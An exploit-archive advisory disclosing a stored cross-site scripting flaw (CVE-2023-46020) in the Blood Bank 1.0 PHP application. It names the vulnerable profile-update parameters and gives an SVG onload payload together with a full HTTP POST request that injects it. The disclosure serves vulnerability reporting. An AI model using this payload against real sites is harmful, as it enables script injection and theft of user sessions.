Blood Bank 1.0 Cross Site Scripting

Blood Bank 1.0 Cross Site Scripting: Posted Apr 2, 2024; Authored by Ersin Erenler; Blood Bank version 1.0 suffers from a persistent cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2023-46020; SHA-256 | ba0ad0ae015b32793ff56d721804fc5356cd2254b484e026f743cfee280d208a; Download | Favorite | View

Blood Bank 1.0 Cross Site Scripting

# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46020

-------------------------------------------------------------------------------

# Description:

The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.

Vulnerable File: updateprofile.php

Parameters: rename, remail, rphone, rcity

# Proof of Concept:
----------------------

1. Intercept the POST request to updateprofile.php via Burp Suite
2. Inject the payload to the vulnerable parameters
3. Payload: "><svg/onload=alert(document.domain)>
4. Example request for rname parameter:

---

POST /bloodbank/file/updateprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/rprofile.php?id=1
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update

----

5. Go to the profile page and trigger the XSS

XSS Payload:

"><svg/onload=alert(document.domain)>

Top Authors In Last 30 Days

Red Hat 292 files
Ubuntu 62 files
Gentoo 32 files
Debian 31 files
LiquidWorm 10 files
Apple 9 files
malvuln 7 files
Ahmet Umit Bayram 4 files
nu11secur1ty 4 files
Adam Gowdiak 4 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,038)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,588)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,751)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,492)
UNIX (9,397)
UnixWare (187)
Windows (6,658)
Other

Blood Bank 1.0 Cross Site Scripting

Blood Bank 1.0 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Blood Bank 1.0 Cross Site Scripting

Share This

Blood Bank 1.0 Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems